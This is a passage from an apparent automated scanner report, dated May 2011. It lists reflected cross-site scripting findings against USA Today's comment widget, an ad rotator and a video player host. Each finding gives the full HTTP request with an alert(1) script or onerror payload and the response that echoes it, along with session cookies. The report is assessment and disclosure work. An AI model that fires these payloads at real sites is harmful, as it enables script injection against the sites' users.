Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 65069><img%20src%3da%20onerror%3dalert(1)>cc5552da031 was submitted in the plckcommentonkey parameter. This input was echoed as 65069><img src=a onerror=alert(1)>cc5552da031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story65069><img%20src%3da%20onerror%3dalert(1)>cc5552da031&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:39:06 GMT
Connection: close
Content-Length: 34352

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_68630\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"46732364.story65069><img src=a onerror=alert(1)>cc5552da031\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

2.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6993e><img%20src%3da%20onerror%3dalert(1)>03214fcf160 was submitted in the plckcommentonkeytype parameter. This input was echoed as 6993e><img src=a onerror=alert(1)>03214fcf160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article6993e><img%20src%3da%20onerror%3dalert(1)>03214fcf160&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:58 GMT
Connection: close
Content-Length: 34697

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
mments_94908\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"46732364.story\" commentOnKeyType=\"article6993e><img src=a onerror=alert(1)>03214fcf160\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

2.108. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/2735/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 288f6<script>alert(1)</script>9a54fef53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet288f6<script>alert(1)</script>9a54fef53a/ajrotator/2735/0/vj?z=1&dim=407&pos=2&kw=business&pv=2784063408616931&nc=12160664&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:02 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet288f6<script>alert(1)</script>9a54fef53a/ajrotator/2735/0/vj not found</pre>
<BR>

2.109. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/2735/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dff80<script>alert(1)</script>6fbd07804ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatordff80<script>alert(1)</script>6fbd07804ba/2735/0/vj?z=1&dim=407&pos=2&kw=business&pv=2784063408616931&nc=12160664&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:02 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatordff80<script>alert(1)</script>6fbd07804ba/2735/0/vj not found</pre>
<BR>

2.110. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/541/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49990<script>alert(1)</script>42110efa79f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet49990<script>alert(1)</script>42110efa79f/ajrotator/541/0/vj?z=1&dim=399&pos=4&kw=business&pv=2784063408616931&nc=91906287&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:18 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet49990<script>alert(1)</script>42110efa79f/ajrotator/541/0/vj not found</pre>
<BR>

2.111. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/541/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 204c1<script>alert(1)</script>890dbe70db7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator204c1<script>alert(1)</script>890dbe70db7/541/0/vj?z=1&dim=399&pos=4&kw=business&pv=2784063408616931&nc=91906287&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:18 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator204c1<script>alert(1)</script>890dbe70db7/541/0/vj not found</pre>
<BR>

2.112. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/543/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84d31<script>alert(1)</script>e398163a75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet84d31<script>alert(1)</script>e398163a75/ajrotator/543/0/vj?z=1&dim=399&pos=3&kw=homepage&pv=298638020176442&nc=64783188&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:43 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet84d31<script>alert(1)</script>e398163a75/ajrotator/543/0/vj not found</pre>
<BR>

2.113. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/543/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49b08<script>alert(1)</script>83ea7d8e48d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator49b08<script>alert(1)</script>83ea7d8e48d/543/0/vj?z=1&dim=399&pos=3&kw=homepage&pv=298638020176442&nc=64783188&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:44 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator49b08<script>alert(1)</script>83ea7d8e48d/543/0/vj not found</pre>
<BR>

2.114. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/546/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d044<script>alert(1)</script>95aec28d31d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet2d044<script>alert(1)</script>95aec28d31d/ajrotator/546/0/vj?z=1&dim=399&pos=3&kw=business&pv=2784063408616931&nc=72887006&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:13 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet2d044<script>alert(1)</script>95aec28d31d/ajrotator/546/0/vj not found</pre>
<BR>

2.115. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/546/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9946<script>alert(1)</script>cb71ce7c288 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatorb9946<script>alert(1)</script>cb71ce7c288/546/0/vj?z=1&dim=399&pos=3&kw=business&pv=2784063408616931&nc=72887006&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:13 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatorb9946<script>alert(1)</script>cb71ce7c288/546/0/vj not found</pre>
<BR>

2.116. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/550/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 354e5<script>alert(1)</script>7c956fd878a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet354e5<script>alert(1)</script>7c956fd878a/ajrotator/550/0/vj?z=1&dim=406&pos=1&kw=business&pv=2784063408616931&nc=38240663&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:03 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet354e5<script>alert(1)</script>7c956fd878a/ajrotator/550/0/vj not found</pre>
<BR>

2.117. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/550/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23c91<script>alert(1)</script>fc29d31c5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator23c91<script>alert(1)</script>fc29d31c5f/550/0/vj?z=1&dim=406&pos=1&kw=business&pv=2784063408616931&nc=38240663&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:04 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator23c91<script>alert(1)</script>fc29d31c5f/550/0/vj not found</pre>
<BR>

2.118. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/551/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c1d1<script>alert(1)</script>a1d5365b88f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet2c1d1<script>alert(1)</script>a1d5365b88f/ajrotator/551/0/vj?z=1&dim=406&pos=4&kw=homepage&pv=298638020176442&nc=59843325&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet2c1d1<script>alert(1)</script>a1d5365b88f/ajrotator/551/0/vj not found</pre>
<BR>

2.119. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/551/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3a9f7<script>alert(1)</script>6b4ddb0cab5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator3a9f7<script>alert(1)</script>6b4ddb0cab5/551/0/vj?z=1&dim=406&pos=4&kw=homepage&pv=298638020176442&nc=59843325&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator3a9f7<script>alert(1)</script>6b4ddb0cab5/551/0/vj not found</pre>
<BR>

2.120. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1658<a>f37537d35d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nwa1658<a>f37537d35d2/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:38:07 GMT
Server: Apache
X-Host: w3
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:39:07 GMT
Content-Type: text/html
Content-Length: 674

</table>&nbsp;Invalid Layout File: The layout file templates/user/wvue/layouts/nwa1658<a>f37537d35d2.xml or an appropriate 404 alternative does not exist<br><br><br><br><br><br><br><br><br><br><br><br
...[SNIP]...

2.121. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [playerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The value of the playerID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18a4c(a)2aba04c4501 was submitted in the playerID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_018a4c(a)2aba04c4501&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:02 GMT
Server: Apache
X-Host: w12
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 16:38:02 GMT
Content-Type: text/javascript
Content-Length: 61867

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_018a4c(a)2aba04c4501.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.entriq.net";
